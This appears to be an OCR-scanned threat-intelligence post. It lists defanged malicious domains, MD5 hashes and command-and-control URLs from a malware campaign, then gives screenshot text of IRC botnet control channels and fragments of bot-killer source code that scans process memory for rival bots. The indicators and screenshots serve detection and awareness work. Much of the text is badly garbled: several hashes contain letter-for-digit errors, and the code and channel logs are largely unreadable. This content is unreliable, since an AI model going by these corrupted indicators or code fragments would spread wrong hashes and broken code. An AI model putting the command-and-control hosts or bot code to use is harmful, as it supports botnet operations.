Related domains known to have been involved in the campaign include: 
hxxp://candy-country.com 

hxxp://best-info.in 

hxxp://megadwarf.com.com 

hxxp://good412.com 

hxxp://oceaninfo.co.kr 

hxxp://kukutrustnet7 77.info 

hxxp://kukutrustnet888.info 

hxxp://kukutrustnet987.info 

hxxp://asjdiweur87wsdcnb. info 

hxxp://pedmeo222nb.info 

hxxp://gondolizo18483.info 

hxxp://technican.w.interia.pl 

hxxp://pzrk.ru 

hxxp://bpowqbvcfds677.info 
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hxxp://bmakemegood24.com 
hxxp://bperfectchoicel.com 
hxxp://bcash-ddt.net 
hxxp://bddr-cash.net 
hxxp://bxxxl-cash.net 
hxxp://balsfhkewo7i487fksd.info 
hxxp://buynvf96.info 
hxxp://httpdoc.info 
hxxp://piceharb.com 
hxxp://ultra-shop.biz 
hxxp://googlets.info 
hxxp://kokaco.info 
hxxp://simdream.info 
hxxp://simdream.biz 
hxxp://lamour.ws 
hxxp://prosto.pizdos.net 
hxxp://vse.ohueli.net 
hxxp://uploder.ws 
hxxp://oole.biz 
hxxp://yandexshit.com 
hxxp://emultrix.org 
hxxp://snail.pc.cz 
hxxp://bibi.hamachi.cc 
hxxp://killgay.com 
hxxp://installs.bitacc.com 
hxxp://hg7890.com 
hxxp://dungcoivb.googlepages.com 
hxxp://toggle.com 
hxxp://nhatquanglan2.0catch.com 
hxxp://svxela.com 


hxxp://united-crew.org 


Sample malicious MD5s known to have been involved in the campaign include: 


MD5: cde613793e24508f32c38249d396f686 
MD5:f13e24a0d7372e096392855d423db4da 
MD5:ac43d13455ef4ba50ed522e4a54137dc 
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MD5:e729f992bea0896f104742e5cbc522c2 
MD5:88bed9482f6e0578b59710c41ab890d7 
MD5:0472379daba0ablabee7468786a0953a 
MD5:7507022e3cab75888ea960fb48476f2d 
MD5:0fd3521e3e150f45a7b243de8760d74d 
MD5:ad4007f5ee084e27f7149a98dfa469ba 
MD5:d2b08dfcd438d8c106f9be5157553454 
MD5:cd193c00728634b6ac3f91cOc5bcf196 
MD5:8f69e9577380fd9ba37c1d0d9d5603c4 
MD5:eea49d19db46f2cb8767270b019a427a 
MD5:372db70ffa24bc0elbc0ceb2375537b0 
MD5:a738127a58985d233e52eeleaccelbab 
MD5:51a33d949644923332f192346aa38569 
MD5:f47315c7623954c18c8ce83231044ab4 
MD5:21823675dcl1cc678ae28228bbfbdf9e2 
MD5:38ed6d225770518deedae8c906d11d6c 
MD5:637e79d7ae5315d1479fc140ec8f049e 
MD5:39a0f4c388d18b67ebed3c8c1b29dc4e 
09f89b063f884b11fdf785e7eab8548b 
MD5:ce2e644d48492dd254149b51a0d32fe7 
MD5:25c65d3634ee36b1c99a45ce3d5f8fdc 
MD5:e5950a5269c79a7e0158814749f3effc 
MD5:561002ecbef499fc0624cedaacd81066 
MD5:f6fe1019d426535765ae3800eafb7b9b 
MD5:a4f51e896be7e9f5474d24e0c20b0d24 
MD5:0d294580dafad0al6849fae4af757c3b 
MD5:1ad98858daf6d7f570918b4c3402d824 
MD5:0230f77066c14f50b42f32bcb195c8a3 
MD5:95158942a3b730307abbd863a0cc6ab6 
MD5:f5c9d013f0e363fleab616e3a97b83cd 
MD5:ad0bf946c3e415d9b7842326afb11b90 
MD5:03d7957bf93b01365ec16ef9bf6bcccl 
MD5:bb2ffoccce05868adf958d90f458d970 
MD5:25a9e89e00798cdd8e358f29524b2539 


MD5:a3b69591bc5bce27100fel8deaf97a99 
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MD5:1f2836f33ff85a814e3fb6e17e1b9cc9 

Related domains known to have involved in the campaign include: 

hxxp://ohueli.net 

hxxp://emultrix.org 

hxxp://lamour.ws 

Related domain C &C server URLs known to have been involved in the campaign include: 
hxxp://pzrk.ru/logo4.gif?1395a=80218 &id=2378151660 
hxxp://pzrk.ru/logo4.gif?12a76=76406 &id=2626553800 
hxxp://aapowgbvcfds677.info/?fd1c=64796 &id=2378151660 


hxxp://c34.statcounter.com/counter.php?sc _project=3034266 &java=0 &security=297102af 
&invisible=0 


hxxp://jbalofhkewo7i487fksd.info/?41d39=269625 &id=241094347 
hxxp://32106.bpowqbvcfds677.info/?32106=205062 &id=241094347 
hxxp://abpowqbvcfds677.info/?323d5=205781 &id=241094347 
hxxp://macedonia.my1.ru/mainh.gif?32905=207109 &id=241094347 
hxxp://good412.com/c.bin 
hxxp://www.good412.com/c.bin 
hxxp://www.f5dsljkkk4d.info/?id25 765twcvqr41865 &rnd=70609 
hxxp://bpowqbvcfds677.info/?32145=205125 &id=2507836605 
hxxp://pzrk.ru/logo4.gif? 361b9=221625 &id=2578125312 
hxxp://abpowgbvcfds677.info/?324fe=206078 &id=2507836605 
hxxp://bbaakemegood24.com/?33a7a=211578 &id=2578125312 
hxxp://32319.bpowqbvcfds677.info/?32319=205593 &id=2507836605 
hxxp://joalofhkewo7i487fksd.info/?40f2f=266031 &id=2507836605 
hxxp://aapowqbvcfds677.info/?32452=205906 &id=2507836605 
hxxp://ww11.bbeakemegood24.com/ 
hxxp://macedonia.my1.ru/mainh.gif?13033=77875 &id=2456212732 
hxxp://bbaakemegood24.com/?12d83=77187 &id=2623433696 
hxxp://jrsx.jre.net.cn/logos.gif?135ef=79343 &id=2456212732 
hxxp://pzrk.ru/logo4.gif?142ef=82671 &id=2623433696 
hxxp://bbaakemegood24.com/?1a3cc=107468 &id=2456212732 
hxxp://17a3c.bpowqbvcfds677.info/?17a3c=96828 &id=2551547297 
hxxp://bbaakemegood24.com/?1d200=119296 &id=2551547297 
hxxp://pzrk.ru/logo4.gif?18b43=101187 &id=2551547297 
hxxp://aapowqbvcfds677.info/?17b74=97140 &id=2551547297 
hxxp://technican.w.interiowo.pl/tanga.gif?12f67=77671 &id=2378151660 
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hxxp://pacwebco.com/logost.gif?13081=77953 &id=2626553800 


hxxp://abpowqbvcfds677.info/?fd8a=64906 &id=2378151660 


hxxp://bbaakemegood24.com/?11298=70296 &id=2626553800 


hxxp://perevozka-gruzov.ru/ft.gif?17318=95000 &id=2503118808 


hxxp://joalbfhkewo7i487fksd.info/?21f55=139093 &id=2378151660 


hxxp://bbaakemegood24.com/?111ed=70125 &id=2503118808 


hxxp://pacwebco.com/logost.gif?109ce=68046 Gid=2503118808 


hxxp://perevozka-gruzov.ru/as.gif?17961=96609 &id=2503118808 
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1. https: //blogger . googleuser content . com/img/b/R29V2Z2x1/AVVXsEiQsN_nA7draf03koSLDYIO-sIvL19W1BqTyr89ixJiqgR38C 
2. https: //blogger .googleusercontent.. com/img/b/R29vZ2x1/AVvXsEgFpw8H7J_rKYeCxwd6CSW j 9tp2xK7Li jTOUyytyuSDe7Gon 
3. https: //blogger . googleuser content . com/img/b/R29V2Z2x1 /AVVXsE jnt5GXcDv3_XEjcl8aReqXpmudA-P# sw0oqIwZ154sgY23 
_ https: //blogger . googleuser content . com/img/b/R29V2Z2x1/AVVXsE jnt5GXcDv3_XEjcl8aRMeqXpmudA-Pf sw0oqlwZ154sgY23 
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18.10.29 Exposing a Compilation of Botnets-in-the-Wild Screenshots - An Analysis 
(2022-10-27 19:59) 
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erpeer .info 
argier .info 
fulier .info 
lavyer .info 
inquir .info 
orodes .info 
faites .info 
beeves .info 
quoifs .info 
filths .info 
broths .info 
nevils .info 
swoons .info 
sallat .info 


apalet .info 
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shadowhbot . Microsoft Vieual C++ 


[Gicbale) +) (AE gobs members) +|| @DoSearch jR-~y SHS IUS 
Ele Edt View Insert Broject Quld Tools window biel 
8scB0 & 1 BH Gy SOCKET sock =| 


JJ 


[BD Workspace ‘thadowbet' 1 peoject{:| udes bh 
- GF shadowbot files ros.h 


ModMemoryfind.cp 


/@ AS3"s botkilier Credits to the sexy guy: )*/ 
#include “includes. h* 
#include “externs. h* 


S GaMsn bh(SOCKET sock) void DoSearch( unsigned lons uStertAddr, unsigned long uEndAddr, PROC 
|S) ModAddT oRa cpp (SOCKET sock. cher *token[10] void KillBot (SOCKET sock, PROCESSENTRY32 pe32 ); 
\5) ModBotKile: cpp cher asg[2S6]; 
13) Modi Server cpp re s_Search 
|S) ModMemonfind cpp ffer{ 0x$000 ) = (0 ): chore szBot: 
+ peer pr Curbut[ 0x500 i‘ = (0): chore szString: 
= ect ci 
fl bess + OpenProcess(PROCESS_A 

+ Gi inchdes bd long uCurdddr = uStertadd) * papi sSearch[ ] = 

IB) incudes.h hd = ReadProcessMenory( hPro { “¥NC ariatis At *\e52\2046\204 2020 30\e 3003 3c ZEN BON 30N 03 


*RXBot* 
“RXBot* {Scan}: }: 
“RXBot*. “Sx33\xCONKE4NK03NK40NK30NK75NK0C\x8B" }. 


{ 
a) ; 
$ “REBot™. “\xEB\x1O\xSANX4AK33 SKC 9SK66KB9S"7D" ns 
t 


het. *Unknown*, “f&echo bye" }, 


&( szBigBuffer, (char #)Curb NULL, NULL } 


{ token[4] '+ NULL ) 


}: 
void DoSearch(SOCKET sock. unsigned long uStertAddr. unsigned long uE 
( strstr( szBigBuffer. token|| 


cher szBisBuffer[ 0x5000 ] = ¢ 0 }; 
unsigned cher Curbuf[ 0x500 ] = { 0 }; 


HANDLE hProcess + OpenProcess( PROCESS_ALI_ACCESS, FALSE. pe32.th3 
for( unsigned long uCurdddr + uStartAddr; uCurAddr <* uEndAddr; uC 


Bprintf(mss. “PRIVMSG Xs 
bend(sock. ass. strien(ass). 


printf(* 
sprintf 


5 ClossView | 8) FaeView 


TA buia { tatay wed in Fees 1 ed ns Fes 2 ‘ * 
Read Ln 31. Col 52 


Dear blog readers, 


I’ve decided to share a compilation of botnets-in-the-wild screenshots coming straight from 
the source namely various cybercrime-friendly forums internationally with the idea to raise 
everyone’s situational awareness on the current state of the botnet ecosystem globally in the 
context of having hundreds of folks out there building and generating these potentially earning 
tens of thousands of fraudulent revenue in the process. 


An image is worth a thousand words. 


Sample screenshots of various botnets-in-the-wild obtained using public sources include: 


[2] 
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Fie ‘View Favorites Took Commands Window Help 


ale Bo ZGiysoea ters itz2i2o 


: [UsB]aejenmgdo « 
[Version] (UsB )aghnamhpt 
(UsB]itdpjkF [Yersion] (UsB]agtckujn 
(Us8 ]dphcprab [Version] (UsBjagtlznth 
[Yersion] (UsB Jahatilwac 
(Yersion] (UsB)aicsnyhr 
(UsBjaldsiwmb: [Version] (UsBjaigyutip 
(UsB)urlfnajn: [(Yersion) (UsB)ajdgbbri 
(UsB]yqcevujgn: [Version] (UsB Jakun jdFfF 
[UsB8 ]bbxoocr [Version] (UsB]aldsiumb 
(UsB)]ytwcthxp: [Version] (UsB]amhuobhn 
(UsB]hhqkduas: [Version] $ (UsB janpphbvl 
(UsB]sewitahl: [Version] (UsB )apwafkzt 
(UsBJetauuind: [Version] (UsB]asffjole 
(Yersion] ‘ (UsB]aszceifp 
[Version] (UsB]atfnyzea 
[Yersion] (UsB) avayqxgr 
(UsB)ctdsliii: [Version] ‘ (UsB ]axucapre 
(UsBjerbshiea: [Version] (UsB]ayulyzyp 
[UsB )ovnquxg [Yersion] (UsB ]bbahbxdy 
[UsB]fedtxjyb: [Version] ‘ [Us8 ]bbhzqehd 
(UsB8 ]geytnos [Version] (UsB ]bbuetbqj 
(UsB]dhpkwqag: [Version] (UsB)bbxoocrw 
(UsB)krdcefhc: [Version] ‘ (Us8 )berdounf 
(UsB]tnurxhix: [Version] (UsB ]bezysfee 
(UsB)snpakarq: [Version] .[UsB]bdaxxinn ¥ 
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5 x Je 
Se we fetes tah Come wre ie a 
~“@eQagacedeaneognsss 
es te 7 — sy 


(tse © [he me, = tt jo ears * 
[iese] © CCjMe quit IRC (Cliewt exited) “m2 
[Stose] = (Cpe quit IRC (Connection reset by prev) (t)Ho_| e000 


{stcse] = Ce pre quit ( [o_ | een 
{ttcse] + (Cpe quit (ese |eere 
{ttobe] © (Cpe qait tee ¢ ( [o_| eer 
[TTCSO] © CE [ATED Ras quae see ¢ ( jo_ | e008 
[UTC] © [Cpe POET Bas quae tee ¢ CE o_ | eee 
[UTES] + [CMR [Mees Ras que (E [no_ | een? 
[NESE] © [LIMO [PONS Bas quit (t [no_ | eee 
[SSCS] © [CIO [SAND Bae jeknee Ct jo jemse 
[8858] = (CMO [Weer ban (tno | eres 
[S850] = (C/O [OPPO Raw [tC [no_ | ears 
{S8cS0] = (C/O jeeme mae [to eee8 
{stcse] © (epee (tine enes 
{tiene} © cep Ld 
{etese] + (epee Cc pno_j ener 
{etese) + (Ope Ce moj ena 
ienese) © (epee Ce joj anes 
(enese) © (Ope Ce joj enue 
[etese) © (Cpe Ce joj erta 
[etese] © (Cpe Ct [moj erie 
(sicse) = Cele ct [no jane 
{ttobe) = (Cpe Ce pe_jenre 
{stese) = Ce pre [eo janes 
{ttehe) + (epee (e o_| ene 
{eoeSe) © [Cpe [eres nas CE o_ | errs 
[Nese] © (Cp |The Bas (joj ever 
[Se] © [CPM LerSr Bas (jo. eres 
[ESS] © [CIM APTS Bas Cojo jenna 
{ANSe] © CEO | PNEE hae Ce jo jeere 
[Oose] © [CMO [APES has Ct [oe 
{fiese] © (Cpe [tse has (t)o_ | e308 
{fiche} © (Ce janes nae [C [o_ | eee 
{fiche} © (epee (reer nas (te | eee 
{ttohe) = (Ej peeer mw: ( jno_ | ene 
[Pte] © [Cp Ore Bas (Ct jno_| ener 
{U0eS4) © CEP | reRr mas (t no_ | ene 
[80059] © [EPL ORTP Bas (ene | ears 
[N0eS5] © CCIE [OePs Bes (Cl iewt exktes) (i [no jeune 
[88e55] = (CIM | PeR? Bes (Cliewt waited) (Eno | eens 
[S855] = CC) [esr Bae {tno jensen 
{8ho54] = (Ce (Ore? has TE [rej ene 
[89554] © (CJM [PTGS Baw quit HRC (Cliewt exited) [et [ne ener 
{Sto89) + (Cj [eDEr Bas jodece oa Ce je_jener 
{TTO8T] © CEO PEEP Ras quae FRC (Cliewt exites) (tjno_jears 
[TTCST] © CEI [AEP Ras jeknee (tno jeare 
{USCST] © (CMO IAET? Bas quae te sal exited) CE jo | ener 
[U5ES5] © [CIHR [TORS Res jokers Ce joj ewes 
[80555] © [CIMO_ [PORT Bes jokers Ct [o_ | ewrs 
[84255] © [CO [THD hae jolnee (i [moj eure 
[14254] © [C]MO_ [SMS Ban joinee (po) 
[A454] = (C/O [POPP has jeteee ol ead 
{ttob4) = (Cpe press jeinee TU Lil Bad 
{ttebt) + (Cpe pamee qeit i tien reset by peer) (C [no_| eee 
[2808] © [Cpe | FeES as jelnee ~ icine jere 2 


[4] 
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Government, RIAA, ANTI-Piracy & Related Groups: By entering, you are violating 
code 431.322.12, Internet Privacy Act signed by Bill Clinton in 1995 
Therefore you CANNOT threaten cur ISP(s), personis) ce coapanyls) storing 
these file(s) cr using this network and cannot prosecute. 

Please leave this network maw as you are violating cur Teres Of Use & Service 


sets sode +i 
sets sode 

sets sode 

sets sode 

sets sode 

sets sode +9 
sets sode +h 
sets sode +a 
sets mode tA 
sets mode +s 
sets sode WN 
sets wmode Ww 
sets mode +H 
sets mode +t 
sets sode +p 


You are naw an IRC Operator 
QPERDTD File is sissing 
There are @ users and 74901 invisible on | servers 
3 :channels foreed 
I have 74991 clients and | servers 
Current Local Users: 74901 Max: 79274 
(04:56) Current Global Users: 74901 Max: 70274 


ame - i) mand 3¢-) 04:58 


X%Chat IRC Servidor Confi 


SSS 


centinela5154 has quit (Ping timeout) centinelal074 
centinela4345 has quit (Ping timeout) centinelal083 
centinela5177 has quit (Ping timeout) 
centine1lal243 has quit (Ping timeout) 
centinela420 has quit (Ping timeout) centinelo1088 
centinela4638 has quit (Ping timeout) 

centinela938 has quit (Ping timeout) centinelal089 
centinelal768 has quit (Ping timeout) centinelal095 
centinels9009 has quit (Ping timeout) 

centinela2$42 has quit (Ping timeout) centinelol099 
centinela4635 has quit (Ping timeout) centinelal102 
centinela7432 has quit (Ping timeout) 

centinelas653 has quit (Ping timeout) centinelall09 
centinels9363 (haxOr@host03 web. com) has joined 
centinela7326 (hax®r@cpanel¢ dnet.com) has joined 
centinela9527 (hax0r@207. 21 19) has join ceminelall22 
centinelass77 (hax0r@209. 8.2 has joined 
centinela2839 (haxOr@server net) has joined @ 
centinela7967 (hax0r@64. 191 5) has joined centinelal126 
centinels9479 (hax0r@66. 197 1) has joined 

centinela2186 (haxOr@server® catedusa, com) has joined ——a continelall3 
centinelag973 (hax0n@62.212 has joined centinelall34 
centinela$316 (hax0r@62.212 has joined 
centinelaSS11 (hax0r@83,211 has joined centinelall35 
centinels9338 (hax0r@195. 62 has joined centinelol137 
continelat276 (haxOr@server! sive ether =? 


centinela2141 (haxOr@srv4.m rmet.net) has joined centinelal139 
centinela2616 (haxOr@dspnet org) has joined centinelal140 
centinela7534 (haxOr@213. 189 has joined jibe 


centinela2939 (haxOr@cube. bl has joined centinelal 153 
centinela2432 has quit (Pinc ut) centinelal154 


centinela7648 (haxOr@veb3. we ource.net) has joived ee 
centinelass@ (hax0r@69.5. 64 nil — a! centinelal 156 


centinelal087 


centineloll18 


centinelol125 


5.64 
centinelaS$82 has quit (Pinc ut) 
centinela681 has quit (Ping t) 
centinela7484 has quit (Pinc ut) centinelall67 
centinela7633 (hax0r@33, 149 has joined 
centinelaté23 (hax0r@69.56.1 ) has joined # sl 


centinelol 164 


centinelall7 
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‘Tite Wer Fevortes Took Commands Window Het 5 
@eOng 00s 2808 e20G05735 
‘Due Te De 


(he 
USA~ 988] 1X2eVOh/EMU| has joined 
1TA=@@@|PurT@a| ITA] has quit IRC (Connection reset by peer) 


=) USA~ OBB] 50501264) ENO] 


USA~ 888) SQsJpor jl era] 


ITA-@@@|ROKRPOD|ITAIH) has joined _USA=@BB] SUASUCO | EMM] Mt] 
1TA=@@@|ZT7ZpPAZF IITA] has quit IRC (Connection reset by peer) _USA~ OBB) SulDNYp | ENG) 
1TA-@@0|d7K2ZP ny] 1TA[N] has joined HB _USA=OdB] Sy 142 /eC | Er | My] 
HEL 22] UZIZEIRC|FRO|M] has quit IRC (Ping tineout) _USA~ OOO] S2¢he 190 | Era] 
1TA=@@@|URVUNOK] ITA] has quit IRC (Connection reset by peer) _USA> OBB] GAMNgHS | Eh | My) 
USA-@@@|UTEKTAR| CM |M] has joined Im _USA= OBB] 6FPRgDG | Era | M4] 
CGY<@88]| pOOF Zar [ARC |H] has quit IRC (Ping timeout) US A> @bB) 6gOG212 | Cry) 
SUM-@@@]ouSThum| SLU] has quit IRC (Connection reset by peer) USA O08) 6GunG Teh | Era] My 


TA=@@T/ODtykPy| ITA] has quit IRC (Ping tineout) USA> GOB] STeRu TSK | Ere | MH] 
028 | qndoUnbe|SLU]M] has quit IRC (Connection reset by peer) 

090) k2nIJnw)/ CNG (M] has joined USA~ SOO] SL g5OnI8 | Cr] 
000) 7 fandibk/HSO/M] has joined USA~ OBB] 6oKSs0| CMM] MH] 
ITA ee) O0Kawuz | ITA] has joined USA OOO] 6PSzaTOT | Cra) My 
1TA=@@@|ourR25P|1TA] has quit IRC (Software caused connection adert) USA~ OBB] GAFLEPAD | Era | M] 
SUH- OSS] A6ZHKTKISLU[H] has quit IRC (Ping timeout) USA~ OBB] SSazZATA| EMM] 
FRA-@88| Ke TGGHIFRA) has joined USA~ OOO] 6TJdXe OU | EMM | M] 
1TA-@@@| CUIO6XU2 | 1TALM] has fos USA~ OOO] 6txOICq | EM | MH] 
ESP 080] H20u/Ke |ESH|H| has joined USA~@dB] 6uavnrr | EM) 
Filt-@@@|nphocak|FINiH] has quit 1 tion reset by prer) USA> OBO] 6yCwtiF 7 | Ere] Mt} 
1TA-@@@] UsHYAsqe|ITAIH) has joined USA~ SOG] PIct 19DE | EMM] Hy 
ITA-@@8|CifeTumjITAjM)] has quit IRC (Connection reset by peer) USA> OG] P7 ANE UX | Ets | My) 


SUM-@@8/BUBnYyxcJ|SLU[H)] has quit IRC (Ping tineout) _USA> 808] 7a7ESUal EM) 
WI HARUM] has quit IRC (Ping tineout) _USA~ 808] 7C1 fsb IN] EMM | My 
USA~@@8|2ppXOy9s ENUM] has quit IRC (Software caused connection adert) _USA~ GBB) 7CPQKADL | EN] 
1TA-@@@) y6cFauCU|ITA[M] has quit IRC (Ping tineout) USA 808] PdwgbC 1 | EM) My] 
ITA-@@@|DtHEGAS|ITAIH) has joined _USA~@08] 7H2920u0 | EMM | Mt] 
SUM- O28] UrcOHtni | SLU|M) has fod _USA- 808] 70x tren] EMU) My 
ITA-@@@) kyCUROUKIITALH] has quit tion reset by peer) USA 88B| 7QQKOF SS) EN) 
ITA-@@8|TRKINSEL/ITAIH) has joined _USA-@OB| PtFOQKt | EMU | NM] 
ITA-@@8|hAKap7cS|1TA|M] has quit IRC (Connection reset by peer) _USA~ O80] 7Uipl 740) ENy) 
ITA-@@@/ELtZ0J3y)1TA| has joined _USA~ 800] 7uTHRPA) EMU) MY 
1TA-@@0| 7ThEUPARE|ITALH| has fod _USA~ 808] 7XxXiyA| EMO) MY 
ITA-@@8|LOFGISEITAIH) has joined _USA- 808] 7ykAUOU | EMU | NM] 
SWE-@98|UENs862|SUE|H] has joined _USA- 808] 7¥Xy lwo [EMU] 
ITA-@88|CCUCi sue) ITAIH) has foi _USA- 800] B2knqED| EMU] MH] 


USA- OBO] BADGEEN | EMU] 
USA-ObO| 88XSSu77 | EMU | IH] 


i 
3 
i 


tion reset by peer) 


FRA-@@@| eKtonEU|FRA|M] has quit IRC (Connection reset by peer) _USA- 8b0| BBRCSUK? | EM) 
BIH-@@8|190gLbit/BSBj HM] has quit IRC (Software caused connection adert) _USA- BBB] BcAmered | EMU | MH] 
SUN-@88|WH1EQG9|SLUIM] has quit IRC (Connection reset by peer) _USA- BBB] BCESAJa| EMU | My] 
HRU-@8@|UGoxfKua|HRUIM| has quit IRC (Ping tineout) _USA- BBB] BFEqQDGXr | EM) MH] 
ITA-@8@|DEXISKILIITAIM] has quit IRC (Connection reset by peer) USA- 8BB] BFUqD2c | ENMU] 
1TA-@88] Gr POCFNE|ITALH] has quit Ping tineout) _USA- SBR] BHKHOS Tw] EN) 


USA-@0B| 8KS O75 | EN | H 
USA-®bB| BKATHOZAa| END] 
USA-®0B| BLLun juz | EMO | Hi] 
USA-®0| BBs Vey | EMU | H] 
USA-®BB| 8nQg0Ci e| EM | Hi] 
USA-®8B| 808eLXIG| EMU | M] 
USA-®BB| Soraya | EN | Ht] 
USA-®0B| 8S6zuk2 | END] 
USA-®BB| Bsqyushk | EMU | Mi] 
USA-®BB| 8UGngP3s | EMU | IH] 


1TA-@88] IKEJDNOJITAIN] has foi 
ITA-@88| SUFEBYzu)1TA| has quit I 
SUM-@88] IpDISBJE|SLU] has joined 
ITA-@@@|KUTHROCIITA] has quit IRC (Connection reset by peer) 
ITA-@@@| HVESCSE|ITAIN] has quit IRC (Connection reset by peer) 
SCE-888| OCSFubTK|SRLIN] has quit IRC (Ping tineout) 
NLD-@@88)|Xules9H|NLD] has quit IRC (Software caused connection abert) 
ITA-@88| tOut37IV|ITAIH] has joined 
1TA-@88|UakBZUNG|ITAIM] has foi 
ITA-@8@| R@@YNZO|ITAIN] has joined 
SUN-@88|/P3NKpTO|SLU|M| has joined 


tware caused connection abert) 


leh 
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+ mIRC ~[ (1937) [+m™nstul: #advscan netapi 220 4 0 -r -b + -a] -18) xj 
TT) Fle Wew Fovortes Tools Commands Window Hel =18) xj 


4A @et goose GBS R0 BH 5735/8 


[2K3] | 484 
[2K] | 9005 
[2K] | 0016 
[2K] | 0051 


[2K] | 0064 

[2K] | 8065 

[2K] | 0081 

[2K] | 8165 

[2K] | 8179 

[2K] | 0286 

[2K}| 8374 

[2K] | 8406 

[2K] | e409 

[2K] | 0484 

[2K] | 0497 

[2K] | 0526 

(2K) | @531 

[2K] | e591 

[2K] | 8659 

[2K] | 8687 

[2K] | 8693 

[2K] | 9742 

* How talking = [2K] | 9760 

Topic is ‘#aduscan netapi 228 4 8 -r -b ~s ~a* [2K] | 0765 

nm Sun Dec 10 O1:57:541 [2K] | 0806 

[2K] | 822 

[2K] | 8885 

* [XP] ]95105568 joined [2K] | e899 

» [XP]] 03741160 joined [2K] | 8949 

* [XP] /82020398 joined [2K] | 0974 

* [XP]/13536678 has joined [2K] | @982 

* [XP]]21795381 has joined [2K] | 8999 

* [XP] 60989134 joined [2K] | 1067 

* [XP] | 18361395 joined [2K] | 1067 

* [2K]]93655141 has quit IRC (Connection reset by peer) [2K] | 1968 

* [XP]/50195591 has quit (Ping timeout) [2K}| 1978 

* [XP]]62097581 has joine [2K] | 10998 

* [XP]]46747223 has joined [2K] |] 1104 
* [2K]]66727403 has quit IR ng timeout) =) r2K1111722) 


4 
no 


no 


d y 
-rarinject 
.p2p 


> 


> + 
DAaAnann 


hh 
nn 


> 


> & 
NAOAAAHRMH 


>t 
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5 File View Fewertes Took WNiScret Window Nelp -z « 


(2 aS 


[11] 


E 


EEE EEE EEE E EEE EEE CECE EEE CECE LEE eee rt by 


Abjects 
& & aurels 
Netaplite 
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SC! eas rn x 
‘wl (@o|ZligaSalferesleesiaaiS0Sal2 
i LO Channels List 


aosepcictaeseecereteaieei oo a LEM TESPEXPIS4S5781 (HESU3D@190. 4) Quit (Ping timeout) » @t@nix «+ 
sa t oo 
i [ARGIXP]2 
(bac ' (ARG| XP] 4 

Ww Channels List r [AUS |xP|3 
' [BEL|XP]1 
; [BEL|XP|2 
[BEL|XP|3 
[BEL|XP|8 
[BGRIXP|9 
[BRA|xP] 8 
[BRA|XP| 8 
[BRA|xP}e 
[BRAIXP|1 
[BRAIXP|4 
; [BRAIXP|1 
; [BRA|XP|2 
[BRA|XP|2 
I" [BRA|XP|2 
; [BRA|XP|3 
[BRA|XP|3 
[BRA|XP|3 
[BRA|XP] 4 
, [BRAIXP]4 
r [BRAIXP|5 
! [BRAIXP|5 
[BRA|XP|5 
r [BRA|XP|7 
[BRA|XP|S 
[BRAIXP|8 
[BRA|XP|8 
r [BRA|XP|9 
[BRA|XP|9 
[BRA|XP|9 
[CANjUs|8 
[CAN|XP|2 
[CAN|XP|2 
= [CAN|XP|2 
[CAN] XPS 

= ~ [CAN] XP]S8 ~ 
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Re ——— 
wile @4 Zignsgalfecs sails 


ev 


[ARG] XP] 24498) 
@ Channels List [ARG|XP| 30895) 
[ARG] XP] 28299) 
[ARG|XP|52295) 
[AUS|VS| 72846) 
[AUS|XP]84859) 
[AUT] VS] 62626) 
[BEL] XP] 29928) 
—~ [BEL|XP| 77127] 
[BEL|XP|95738) 
[BGR] XP] 88396) 
[BRA] XP] 09311) 
[BRA|XP| 07155) 
[BRA] XP] 89592) 
[BRA] XP] 16359) 
[BRA] XP] 19394) 
[BRA|XP | 24697] 
[BRA|XP | 29863) 
[BRA|XP | 26196] 
[BRA|XP | 28674) 
[BRA|XP | 39185) 
[BRA|XP | 39643) 
[BRA|XP | 39050) 
(BRA) XP] 41028) 
[BRA|XP | 44179) 
[BRA] XP] 45895) 
[BRA] XP] 29906) 
[BRA|XP | 58593) 
[BRA|XP| 59544) 
[BRA|XP | 63799) 
[BRA] XP] 63904) 
[BRA|XP| 70447) 
[BRA|XP| 71007) 
[BRA|XP| 74217) 
[BRA|XP| 77077) 
[BRA|XP| 80317) 
~ [BRA|XP|82646] ~ 
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pT 


[15] 


[5225] 


(19:20 
[19:20] 
peer) 

[19:20 
[19:20] 
[19:20 
(19:20 
(19:20 
[19:20] 
peer) 
[19:20] 
[19:28 
[19:20] 
peer) 
[19:20] 
[19:28 
(19:24 
[19:24 
(19:21 
[19:21] 
[19:21 
[19:21 
[19:21] 
(19:24 
(19:24 
(19:24 
[19:21] 
(19:21 


* Joins: [ 00] ISL [565888] 
* Quits: [00)USA|109413] 


« Joins: [8O)EGY|821514] 
* Quits: [60]FRA|908586] 
« Joins: [60]NLD| 426835) 
* Joins: [22|GBR|782977] 
* Joins: [64/USA| 100846] 
* Quits: [00)GBR| 715230) 


= Quits: [00)SWE,/393501] 
* Joins: [O8)/ESP|843461] 
* Quits: [0]DNK|308931] 


* Quits: [60)USA|579187) 
* Joins: [66/USA|943275] 
* Joins: [00)HUN| 366133] 
* Joins: [80)/USA|524698] 
* Joins: [02|SWE|[6%0262] 
* Quits: [00|C2E|790912] 
« Joins: [80)NLD| 196825] 
* Joins: [80/USA|740516] 
* Quits: [61]/USA|956383) 
* Joins: [05|SWE|964086) 
* Joins: [60] SWE| 609561) 
* Joins: [00|/CZE| 408619) 
= Quits: [00)POL|366470) 
* Joins: [80]NOR|627427] 


unable to resolve 


resolved 


USA | G0 | > | SPO] C089 
ad Kick 


[USA] O4/ xP || 49979) 
ONS resolv 
. 
@4| xP | P| 69979) 
hj @4/xP]P| 69929} +++ 
h]O5 [XP]? | 69929) 00° 
| xP | P6979) 
@4| xP | P| 69929) 


82) eS) 


) (Connection reset by 


(COMPUTES 
(RUSSELL 


(EL -NEMRE ) 


(SUNSHI ) (Ping timeout) 
(PRIU-6It ) = 
(AMSSRU OF ) 


(ASUSQ67 


) (cor 
Ping 


( JKL 0188 Conner 
(TABLES 
(PC119952 
(GYOGY-1E 
(Pua7 1.94 
(HEMMARE 
(ALEX-51 
(KER I MG87 
(HASEE-@ 23) 

(WAWELG7 ing timeout) 
(Error@s 
(WINGZ0 OF 
(ALEX-54 
(U6N9Y 
(KRISS@BS 


ing timeout) 
253) 
) 


(Ping timeout) 


) 


(Ping timeout) 
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[17] 


reglet .info 
camlet .info 
plamet .info 
hownet .info 
fosset .info 
cuplift .info 
raught .info 


holdit .info 
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[(Giobais) =) | (AN gba! members) =)[ @DoSearch 1R-~ SGH* 1 nS 


Ble Edt Yew Insert Broject Buld Tools Window telp 
@scG0 me --2- MPS Qsonerna 7) & 


ModMemoryf ind.cf 


it 
pinciude "includes h* 
finclude “externs h* 


void DoSearch( —— long uStertAddr, unsigned long uwEndAddr, PROC 
void + prea , PROCESSENTRY32 pe32 ); 


char nsg[ 25! 
struct s_! 


